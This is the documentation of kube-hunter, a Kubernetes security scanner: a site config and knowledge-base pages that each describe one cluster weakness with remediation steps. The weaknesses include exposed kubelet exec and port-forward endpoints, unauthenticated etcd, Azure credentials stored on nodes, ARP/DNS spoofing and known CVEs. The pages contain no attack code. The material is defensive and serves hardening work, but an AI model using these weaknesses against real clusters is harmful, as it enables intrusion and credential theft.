/docs/_config.yml:
--------------------------------------------------------------------------------
1 | ---
2 | title: kube-hunter
3 | description: Kube-hunter hunts for security weaknesses in Kubernetes clusters
4 | logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/main/kube-hunter.png
5 | show_downloads: false
6 | google_analytics: UA-63272154-1
7 | theme: jekyll-theme-minimal
8 | collections:
9 | kb:
10 | output: true
11 | defaults:
12 | -
13 | scope:
14 | path: "" # an empty string here means all files in the project
15 | values:
16 | layout: "default"
17 |
18 | url: "https://aquasecurity.github.io/kube-hunter"
19 | plugins:
20 | - jekyll-sitemap
21 |
--------------------------------------------------------------------------------
/docs/_kb/KHV002.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV002
3 | title: Kubernetes version disclosure
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The fact that your infrastructure is using Kubernetes, and the specific version of Kubernetes used is publicly available, and could be used by an attacker to target your environment with known vulnerabilities in the specific version of Kubernetes you are using.
13 | This information could have been obtained from the Kubernetes API `/version` endpoint, or from the Kubelet's `/metrics` debug endpoint.
14 |
15 | ## Remediation
16 |
17 | Disable `--enable-debugging-handlers` kubelet flag.
18 |
19 | ## References
20 |
21 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
22 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV003.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV003
3 | title: Azure Metadata Exposure
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Microsoft Azure provides an internal HTTP endpoint that exposes information from the cloud platform to workloads running in a VM. The endpoint is accessible to every workload running in the VM. An attacker that is able to execute a pod in the cluster may be able to query the metadata service and discover additional information about the environment.
13 |
14 | ## Remediation
15 |
16 | Starting in the 2020.10.15 Azure VHD Release, AKS restricts the pod CIDR access to that internal HTTP endpoint.
17 |
18 | [CVE-2021-27075](https://github.com/Azure/AKS/issues/2168)
19 |
20 |
21 | ## References
22 |
23 | - [Azure Instance Metadata service](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service)
24 | - [AAD Pod Identity](https://github.com/Azure/aad-pod-identity#demo)
25 |
--------------------------------------------------------------------------------
/docs/_kb/KHV004.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV004
3 | title: Azure SPN Exposure
4 | categories: [Identity Theft]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Kubernetes has native integration with Microsoft Azure, for that a Kubernetes installation on Azure will require API access to manage the cluster's resources in Azure (for example, to create a cloud load balancer). Some installations of Kubernetes on Azure rely on a shared file on the node that contains credentials to the Azure API under `/etc/kubernetes/azure.json`. A Pod with access to this file may become a gateway for an attacker to control your Azure environment.
13 |
14 | ## Remediation
15 |
16 | The better solution would be to use Azure Managed Identities instead of a static SPN. However this functionality is not mature yet, and is currently available in alpha stage only for aks-engine (non-managed Kubernetes).
17 |
18 | You can update or rotate the cluster SPN credentials, in order to prevent leaked credentials to persist over time.
19 |
20 | ## References
21 |
22 | - [Service principals with Azure Kubernetes Service (AKS)](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/aks/kubernetes-service-principal.md)
23 | - [What is managed identities for Azure resources?](https://docs.microsoft.com/en-us/azure/active-directory/managed-identities-azure-resources/overview)
24 | - [aks-engine Features - Managed Identity](https://github.com/Azure/aks-engine/blob/master/docs/topics/features.md#managed-identity)
25 | - [Update or rotate the credentials for a service principal in Azure Kubernetes Service (AKS)](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/aks/update-credentials.md)
26 |
--------------------------------------------------------------------------------
/docs/_kb/KHV005.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV005
3 | title: Access to Kubernetes API
4 | categories: [Information Disclosure, Unauthenticated Access]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Kubernetes API was accessed with Pod Service Account or without Authentication (see report message for details).
13 |
14 | ## Remediation
15 |
16 | Secure access to your Kubernetes API.
17 |
18 | It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principal.
19 |
20 | Consider opting out automatic mounting of SA token using `automountServiceAccountToken: false` on `ServiceAccount` resource or `Pod.spec`.
21 |
22 |
23 | ## References
24 |
25 | - [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
26 |
--------------------------------------------------------------------------------
/docs/_kb/KHV006.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV006
3 | title: Insecure (HTTP) access to Kubernetes API
4 | categories: [Unauthenticated Access]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The API Server port is accessible over plain HTTP, and therefore unencrypted and potentially insecured.
13 |
14 | ## Remediation
15 |
16 | Ensure your setup is exposing kube-api only on an HTTPS port.
17 |
18 | Do not enable kube-api's `--insecure-port` flag in production.
19 |
20 |
21 | ## References
22 |
23 | - [API Server Ports and IPs](https://kubernetes.io/docs/reference/access-authn-authz/controlling-access/#api-server-ports-and-ips)
24 | - [kube-apiserver command reference](https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/)
25 |
--------------------------------------------------------------------------------
/docs/_kb/KHV007.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV007
3 | title: Specific Access to Kubernetes API
4 | categories: [Access Risk]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | kube-hunter was able to perform the action specified by the reported vulnerability (check the report for more information). This may or may not be a problem, depending on your cluster setup and preferences.
13 |
14 | ## Remediation
15 |
16 | Review the RBAC permissions to Kubernetes API server for the anonymous and default service account.
17 |
18 | ## References
19 |
20 | - [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
21 | - [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
--------------------------------------------------------------------------------
/docs/_kb/KHV020.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV020
3 | title: Possible Arp Spoof
4 | categories: [IdentityTheft]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | When using a basic (but common) container networking in the cluster, containers on the same host are bridged togeather to form a virtual layer 2 network. This setup, which is also common for Kubernetes installations. What's also common in Kubernetes installations, is that the `NET_RAW` capability is granted to Pods, allowing them low level access to network interactions. By pairing these two issues together, a malicious Pod running on the cluster could abusing the ARP protocol (used to discover MAC address by IP) in order to spoof the IP address of another pod on same node, thus making other pods on the node talk to the attacker's Pod instead of the legitimate Pod.
13 |
14 | ## Remediation
15 |
16 | Consider dropping the `NET_RAW` capability from your pods using `Pod.spec.securityContext.capabilities`
17 |
18 | ## References
19 |
20 | - [DNS Spoofing on Kubernetes Clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
21 | - [Configure a Security Context for a Pod or Container](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV021.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV021
3 | title: Certificate Includes Email Address
4 | categories: [Information Disclosure]
5 | severity: low
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The Kubernetes API Server advertises a public certificate for TLS. This certificate includes an email address, that may provide additional information for an attacker on your organization, or be abused for further email based attacks.
13 |
14 | ## Remediation
15 |
16 | Do not include email address in the Kubernetes API server certificate. (You should continue to use certificates to secure the API Server!)
17 |
--------------------------------------------------------------------------------
/docs/_kb/KHV022.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV022
3 | title: Critical Privilege Escalation CVE
4 | categories: [Privilege Escalation]
5 | severity: critical
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2018-1002105. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [Severe Privilege Escalation Vulnerability in Kubernetes (CVE-2018-1002105)](https://blog.aquasec.com/kubernetes-security-cve-2018-1002105)
--------------------------------------------------------------------------------
/docs/_kb/KHV023.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV023
3 | title: Denial of Service to Kubernetes API Server
4 | categories: [Denial Of Service]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2019-1002100. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [Kubernetes API Server Patch DoS Vulnerability (CVE-2019-1002100)](https://blog.aquasec.com/kubernetes-vulnerability-cve-2019-1002100)
--------------------------------------------------------------------------------
/docs/_kb/KHV024.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV024
3 | title: Possible Ping Flood Attack
4 | categories: [Denial Of Service]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2019-9512. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [HTTP/2 Denial of Service Advisory](https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md)
21 | - [CVE-2019-9512](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9512)
--------------------------------------------------------------------------------
/docs/_kb/KHV025.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV025
3 | title: Possible Reset Flood Attack
4 | categories: [Denial Of Service]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2019-9514. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [HTTP/2 Denial of Service Advisory](https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md)
21 | - [CVE-2019-9514](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9514)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV026.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV026
3 | title: Arbitrary Access To Cluster Scoped Resources
4 | categories: [PrivilegeEscalation]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2019-11247. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [CVE-2019-11247: API server allows access to custom resources via wrong scope](https://github.com/kubernetes/kubernetes/issues/80983)
21 | - [CVE-2019-11247](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11247)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV027.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV027
3 | title: Kubectl Vulnerable To CVE-2019-11246
4 | categories: [Remote Code Execution]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Kubectl is found to be vulnerable to CVE-2019-11246. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [CVE-2019-11246: Another kubectl Path Traversal Vulnerability Disclosed](https://blog.aquasec.com/kubernetes-security-kubectl-cve-2019-11246)
21 |
--------------------------------------------------------------------------------
/docs/_kb/KHV028.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV028
3 | title: Kubectl Vulnerable To CVE-2019-1002101
4 | categories: [Remote Code Execution]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Kubectl is found to be vulnerable to CVE-2019-1002101. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [CVE-2019-1002101](https://nvd.nist.gov/vuln/detail/CVE-2019-1002101)
21 | - [Another kubectl Path Traversal Vulnerability Disclosed](https://blog.aquasec.com/kubernetes-security-kubectl-cve-2019-11246)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV029.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV029
3 | title: Dashboard Exposed
4 | categories: [Remote Code Execution]
5 | severity: critical
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An open Kubernetes Dashboard was detected. The Kubernetes Dashboard can be used by an attacker to learn about the cluster and potentially to create new resources.
13 |
14 | ## Remediation
15 |
16 | Do not leave the Dashboard insecured.
17 |
18 |
--------------------------------------------------------------------------------
/docs/_kb/KHV030.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV030
3 | title: Possible DNS Spoof
4 | categories: [Identity Theft]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Your Kubernetes DNS setup is vulnerable to spoofing attacks which impersonate your DNS for malicious purposes.
13 | In this case the exploited vulnerability was ARP spoofing, but other methods could be used as well.
14 |
15 | ## Remediation
16 |
17 | Consider using DNS over TLS. CoreDNS (the common DNS server for Kubernetes) supports this out of the box, but your client applications might not.
18 |
19 | ## References
20 |
21 | - [DNS Spoofing on Kubernetes Clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
22 | - [KHV020 - Possible Arp Spoof]({{ site.baseurl }}{% link _kb/KHV020.md %})
23 | - [CoreDNS DNS over TLS](https://coredns.io/manual/toc/#specifying-a-protocol)
24 | - [DNS over TLS spec](https://tools.ietf.org/html/rfc7858)
--------------------------------------------------------------------------------
/docs/_kb/KHV031.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV031
3 | title: Etcd Remote Write Access Event
4 | categories: [Remote Code Execution]
5 | severity: critical
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Etcd (Kubernetes' Database) is writable without authentication. This gives full control of your Kubernetes cluster to an attacker with access to etcd.
13 |
14 | ## Remediation
15 |
16 | Ensure your etcd is accepting connections only from the Kubernetes API, using the `--trusted-ca-file` etcd flag. This is usually done by the installer, or cloud platform.
17 |
18 | ## References
19 |
20 | - [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
21 | - [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)
--------------------------------------------------------------------------------
/docs/_kb/KHV032.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV032
3 | title: Etcd Remote Read Access Event
4 | categories: [Access Risk]
5 | severity: critical
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Etcd (Kubernetes' Database) is accessible without authentication. This exposes the entire state of your Kubernetes cluster to the reader.
13 |
14 | ## Remediation
15 |
16 | Ensure your etcd is accepting connections only from the Kubernetes API, using the `--trusted-ca-file` etcd flag. This is usually done by the installer, or cloud platform.
17 |
18 | ## References
19 |
20 | - [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
21 | - [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)
--------------------------------------------------------------------------------
/docs/_kb/KHV033.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV033
3 | title: Etcd Remote version disclosure
4 | categories: [Information Disclosure]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The fact that your infrastructure is using etcd, and the specific version of etcd used is publicly available, and could be used by an attacker to target your environment with known vulnerabilities in the specific version of etcd you are using.
13 |
14 |
--------------------------------------------------------------------------------
/docs/_kb/KHV034.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV034
3 | title: Etcd is accessible using insecure connection (HTTP)
4 | categories: [Unauthenticated Access]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The etcd server (Kubernetes database) port is accessible over plain HTTP, and therefore unencrypted and potentially insecured.
13 |
14 | ## Remediation
15 |
16 | Ensure your setup is exposing etcd only on an HTTPS port by using the etcd flags `--key-file` and `--cert-file`.
17 |
18 | ## References
19 |
20 | - [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
21 | - [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)
--------------------------------------------------------------------------------
/docs/_kb/KHV036.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV036
3 | title: Anonymous Authentication
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is configured to allow anonymous (unauthenticated) requests to it's HTTP api. This may expose certein information, and capabilities to an attacker with access to the kubelet API.
13 |
14 | ## Remediation
15 |
16 | Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
17 |
18 | ## References
19 |
20 | - [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
--------------------------------------------------------------------------------
/docs/_kb/KHV037.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV037
3 | title: Exposed Container Logs
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is leaking container logs via the `/containerLogs` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 |
15 | ## Remediation
16 |
17 | Disable `--enable-debugging-handlers` kubelet flag.
18 |
19 | ## References
20 |
21 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
22 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV038.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV038
3 | title: Exposed Running Pods
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is leaking information about running pods via the `/runningpods` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 |
15 | ## Remediation
16 |
17 | Disable `--enable-debugging-handlers` kubelet flag.
18 |
19 | ## References
20 |
21 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
22 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV039.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV039
3 | title: Exposed Exec On Container
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could run arbitrary commands on a container via the kubelet's `/exec` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV040.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV040
3 | title: Exposed Run Inside Container
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could run arbitrary commands on a container via the kubelet's `/run` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV041.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV041
3 | title: Exposed Port Forward
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could read and write data from a pod via the kubelet's `/portForward` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV042.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV042
3 | title: Exposed Attaching To Container
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could attach to a running container via a websocket on the kubelet's `/attach` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV043.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV043
3 | title: Cluster Health Disclosure
4 | categories: [Information Disclosure]
5 | severity: low
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is leaking it's health information, which may contain sensitive information, via the `/healthz` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV044.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV044
3 | title: Privileged Container
4 | categories: [Access Risk]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
13 |
14 | ## Remediation
15 |
16 | Minimize the use of privileged containers.
17 |
18 | Use Pod Security Policies to enforce using `privileged: false` policy.
19 |
20 | ## References
21 |
22 | - [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
23 | - [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
24 |
--------------------------------------------------------------------------------
/docs/_kb/KHV045.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV045
3 | title: Exposed System Logs
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is leaking system logs via the `/logs` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV046.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV046
3 | title: Exposed Kubelet Cmdline
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | When the Kubelet is run in debug mode, a Pod running in the cluster is able to access the Kubelet's `debug/pprof/cmdline` endpoint and examine how the kubelet was executed on the node, specifically the command line flags that were used, which tells the attacker about what capabilities the kubelet has which might be exploited.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [cmdline handler in Kubelet code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go#L327)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV047.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV047
3 | title: Pod With Mount To /var/log
4 | categories: [Privilege Escalation]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Kubernetes uses `/var/log/pods` on nodes to store Pods log files. When running `kubectl logs` the kubelet is fetching the pod logs from that directory. If a container has write access to `/var/log` it can create arbitrary files, or symlink to other files on the host. Those would be read by the kubelet when a user executes `kubectl logs`.
13 |
14 | ## Remediation
15 |
16 | Consider disallowing running as root:
17 | Using Kubernetes Pod Security Policies with `MustRunAsNonRoot` policy.
18 | Aqua users can use a Runtime Policy with `Volume Blacklist`.
19 |
20 | Consider disallowing writable host mounts to `/var/log`:
21 | Using Kubernetes Pod Security Policies with `AllowedHostPaths` policy.
22 | Aqua users can use a Runtime Policy with `Blacklisted OS Users and Groups`.
23 |
24 | ## References
25 |
26 | - [Kubernetes Pod Escape Using Log Mounts](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
27 | - [Pod Security Policies - Volumes and file systems](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems)
28 | - [Pod Security Policies - Users and groups](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#users-and-groups)
29 |
--------------------------------------------------------------------------------
/docs/_kb/KHV049.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV049
3 | title: kubectl proxy Exposed
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An open kubectl proxy was detected. `kubectl proxy` is a convenient tool to connect from a local machine into an application running in Kubernetes or to the Kubernetes API. This is common practice to browse for example the Kubernetes dashboard. Leaving an open proxy can be exploited by an attacker to gain access into your entire cluster.
13 |
14 | ## Remediation
15 |
16 | Expose your applications in a permanent, legitimate way, such as via Ingress.
17 |
18 | Close open proxies immediately after use.
19 |
20 | ## References
21 |
22 | - [Accessing Clusters - Using kubectl proxy](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/#using-kubectl-proxy)
--------------------------------------------------------------------------------
/docs/_kb/KHV050.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV050
3 | title: Read access to Pod service account token
4 | categories: [Access Risk]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Every Pod in Kubernetes is associated with a Service Account which by default has access to the Kubernetes API. This access is made available to Pods by an auto-generated token that is made available to the Pod by Kubernetes. An attacker with access to a Pod can read the token and access the Kubernetes API.
13 |
14 | ## Remediation
15 |
16 | It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principle.
17 |
18 | Consider opting out automatic mounting of SA token using `automountServiceAccountToken: false` on `ServiceAccount` resource or `Pod.spec`.
19 |
20 |
21 | ## References
22 |
23 | - [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
24 |
--------------------------------------------------------------------------------
/docs/_kb/KHV051.md:
--------------------------------------------------------------------------------
1 | ---
